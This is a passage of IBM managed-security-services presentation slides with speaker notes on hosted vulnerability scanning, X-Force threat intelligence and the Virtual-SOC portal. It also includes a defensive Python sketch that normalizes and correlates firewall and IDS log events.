Solution Overview: Offers network-based vulnerability assessment from the cloud via the VSOC web portal. Scans can be configured and scheduled via the web, with scanning performed from the cloud or via IBM managed scanners at the customer premises. Results are archived in the cloud and accompanied by reporting, workflow and remediation capabilities.
Core Capabilities:
Vulnerability management: agentless scanning from both inside and outside the firewall to find exposures.
Remediation guidance and workflow: fix vulnerabilities quickly and easily with the information provided in remediation reports.
PCI compliance assistance: IBM can serve as an Approved Scanning Vendor (ASV) in support of PCI compliance initiatives.
Intelligent scanning: delivers accurate scanning results in less time with a system that follows an assessment process similar to that used by ethical hackers. Fewer false positives mean less time spent tracking down "potential" vulnerabilities.
Web application vulnerability detection: identifies SQL injection, cross-site scripting and other high-risk vulnerabilities in web applications.
Database vulnerability detection: identifies vulnerabilities in common databases and database configurations.
Customer Pain Points:
Vulnerabilities allowing hackers easy access to client systems
Proper assessment and remediation are required for compliance initiatives
Today's solutions are difficult to use and manage
Customers can't prioritize remediation efforts for identified vulnerabilities
Benefits: faster time to deploy and more accurate detection of vulnerabilities, helping customers identify risks and ultimately improve their security posture; a more efficient end-to-end process for remediating vulnerabilities, and better tracking for compliance purposes; a streamlined SaaS delivery model that gives customers full control without the expense and distraction of owning and managing scanning infrastructure.
Speaker notes: The Hosted Vulnerability Management Service (VMS) was updated in late 2010 to create an entirely new experience for our customers. This update included a complete overhaul of the offering, brand-new scanning technologies, and an entirely new web-based interface designed to improve manageability of the overall data set and the scalability of the solution, supporting larger implementations and more efficient management of the vulnerability remediation process. Vulnerability management as a service matters to customers because the process itself is complex and challenging: it requires workflow management so that we are not only scanning and assessing for vulnerabilities but also tracking the effort to close them in a programmatic fashion. That is difficult because there are not many technology solutions that accomplish this, so many organizations resort to open source or homegrown tools that are not optimized and result in more time being spent on the process than necessary. IBM recommends solving that problem through our web-based, Software-as-a-Service vulnerability management solution. The solution provides external scanners located in IBM data centers that the customer controls through the Virtual SOC Portal: they can request scans against specific IP addresses, set the scan policies, and have IBM's external scanners reach across the Internet to scan their network perimeter for a hacker's-eye view of potential exposure. By also deploying a managed scanner inside the customer's environment and connecting it to the Virtual SOC Portal, the customer can initiate internal scans to see the exposures an insider threat would find. These scanning capabilities are complemented by detailed logs and scan result reviews inside the web portal, as well as comprehensive dashboarding and reporting.

42 Cloud Security Services: IBM X-Force Threat Analysis Service
Solution Overview
IBM Security Services' X-FORCE Threat Analysis Service (XFTAS) is a security intelligence service that delivers customized information about a wide array of threats that could affect your network security. XFTAS helps you proactively protect your networks with detailed analyses of global online threat conditions.
A single source for up-to-the-minute, customized security information
Expert analysis and correlation of global security threats
Actionable data and recommendations that help you maintain your network security
Easily accessed 24x7x365 through the VSOC Portal
Partner with a trusted security advisor

The Hosted X-FORCE Threat Analysis Service is designed to provide customers with a subscription-based security intelligence capability that keeps organizations abreast of the latest security threats. It is populated on a regular basis with information from IBM's X-FORCE and is designed to help organizations keep their finger on the pulse of the threat landscape. With the X-FORCE Threat Analysis Service, organizations know what the most current threats are, what those threats mean to their organization, and whether those threats warrant a change in staffing or in a security process or procedure within their operations center. It aggregates information from many different sources and gives customers' security teams a single place to look to understand what is going on in the threat landscape.

Threat Analysis Service is included as a bundled component with every Managed Security Service that we offer, so customers receive it if they purchase any of the offerings discussed today. Customers who are not subscribers to the rest of our Managed Security Services portfolio can also purchase it directly from IBM or from one of our Business Partners; they then have a login to our Virtual SOC Portal to access all of the threat intelligence information. We also offer this service with a special remarketing license, which allows organizations to take information out of the service and distribute it to end users, host it on intranet sites, and use it in other security research initiatives they have ongoing internally.

Unique Value
The IBM X-FORCE Threat Analysis Service combines high-quality, real-time threat information from an international network of Security Operations Centers with security intelligence from the X-Force research and development team to develop comprehensive evaluations and recommendations suited to your business.

43 Customers have full visibility into work being performed through the Virtual Security Operations Center portal (V-SOC)
[Diagram: customer data sources (firewalls, IDS and IPS, anti-virus and filtering, applications, networking devices, vulnerability data) feed across the Internet into the Virtual-SOC technology platform (aggregation, correlation, archival, reporting, workflow) and the Security Operations Center (normalize, aggregate, correlate, archive, escalate, remediate); the customer views the results through the Virtual-SOC portal.]
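The SOC stages on the slide (normalize, aggregate, correlate, escalate) reduced to a runnable sketch, as an added example for this transcript; it is not IBM's Virtual-SOC platform code. The firewall and IDS line formats, the five-minute correlation window and the deny threshold are assumptions, and the feed is constructed: one source probes several closed ports and then trips an IDS signature, a second source only trips the IDS, a third is a single benign deny.

```python
"""Toy V-SOC pipeline: normalize two device formats onto one schema,
aggregate per source, correlate firewall denies with IDS alerts, escalate.
Written for this transcript as an illustration; not IBM's Virtual-SOC code."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample feed (formats invented for this example): one firewall
# and one IDS reporting on the same target host 198.51.100.10.
SAMPLE_FEED = [
    '2013-04-09T10:00:01 fw01 DENY src=203.0.113.7 dst=198.51.100.10 dport=22',
    '2013-04-09T10:00:02 fw01 DENY src=203.0.113.7 dst=198.51.100.10 dport=23',
    '2013-04-09T10:00:03 fw01 DENY src=203.0.113.7 dst=198.51.100.10 dport=445',
    '2013-04-09T10:00:04 fw01 DENY src=203.0.113.7 dst=198.51.100.10 dport=3389',
    '2013-04-09T10:00:05 fw01 ALLOW src=203.0.113.7 dst=198.51.100.10 dport=80',
    '2013-04-09T10:00:09 ids01 ALERT sig="WEB-ATTACKS sql injection attempt" src=203.0.113.7 dst=198.51.100.10',
    '2013-04-09T10:01:00 fw01 DENY src=192.0.2.5 dst=198.51.100.10 dport=22',
    '2013-04-09T10:05:00 ids01 ALERT sig="ICMP ping nmap" src=198.51.100.77 dst=198.51.100.10',
]

FW_RE = re.compile(r'^(?P<ts>\S+) (?P<sensor>\S+) (?P<action>DENY|ALLOW) '
                   r'src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)$')
IDS_RE = re.compile(r'^(?P<ts>\S+) (?P<sensor>\S+) ALERT sig="(?P<sig>[^"]+)" '
                    r'src=(?P<src>\S+) dst=(?P<dst>\S+)$')


def normalize(line):
    """Map a vendor-specific line onto one common event schema, or None."""
    m = FW_RE.match(line)
    if m:
        return {"ts": datetime.fromisoformat(m["ts"]), "sensor": m["sensor"],
                "kind": "fw", "action": m["action"], "src": m["src"],
                "dst": m["dst"], "dport": int(m["dport"])}
    m = IDS_RE.match(line)
    if m:
        return {"ts": datetime.fromisoformat(m["ts"]), "sensor": m["sensor"],
                "kind": "ids", "sig": m["sig"], "src": m["src"], "dst": m["dst"]}
    return None


def normalize_feed(lines):
    """Returns (events, unparsed_count). Unparsed lines are counted rather
    than silently dropped: a parser that stops matching is itself a finding."""
    events, unparsed = [], 0
    for line in lines:
        ev = normalize(line)
        if ev is None:
            unparsed += 1
        else:
            events.append(ev)
    return events, unparsed


def correlate(events, window=timedelta(minutes=5), deny_threshold=3):
    """Aggregate per source, then correlate: a burst of firewall denies
    followed within the window by an IDS alert from the same source is
    escalated above either signal on its own."""
    denies = defaultdict(list)   # src -> deny timestamps
    alerts = defaultdict(list)   # src -> ids events
    for ev in events:
        if ev["kind"] == "fw" and ev["action"] == "DENY":
            denies[ev["src"]].append(ev["ts"])
        elif ev["kind"] == "ids":
            alerts[ev["src"]].append(ev)
    escalations = []
    for src in set(denies) | set(alerts):
        probed = len(denies[src]) >= deny_threshold
        hits = alerts[src]
        if probed and hits:
            gap = hits[-1]["ts"] - max(denies[src])
            followed = timedelta(0) <= gap <= window
        else:
            followed = False
        if followed:
            sev, why = "high", "port probe followed by IDS alert"
        elif hits:
            sev, why = "medium", "IDS alert"
        elif probed:
            sev, why = "low", "port probe"
        else:
            continue   # a lone deny is noise, not an escalation
        escalations.append({"src": src, "severity": sev, "reason": why,
                            "denies": len(denies[src]), "alerts": len(hits)})
    rank = {"high": 0, "medium": 1, "low": 2}
    escalations.sort(key=lambda e: (rank[e["severity"]], e["src"]))
    return escalations


if __name__ == "__main__":
    events, unparsed = normalize_feed(SAMPLE_FEED)
    print(f"{len(events)} events normalized, {unparsed} unparsed")
    for e in correlate(events):
        print(f"{e['severity']:6} {e['src']:15} {e['reason']} "
              f"(denies={e['denies']}, alerts={e['alerts']})")
```

On the sample feed 203.0.113.7 is escalated as high (four denies, then an alert five seconds later) and 198.51.100.77 as medium; 192.0.2.5, with one deny, produces nothing. The unparsed counter is the operational check worth keeping: when a device firmware update changes the log format, the correlation silently goes blind unless something counts the lines that stopped matching.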

44 Thank You Gracias Danke Tack Asante sana Obrigado Dankie Merci Grazie ευχαριστώ Спасибо Hvala Köszönöm

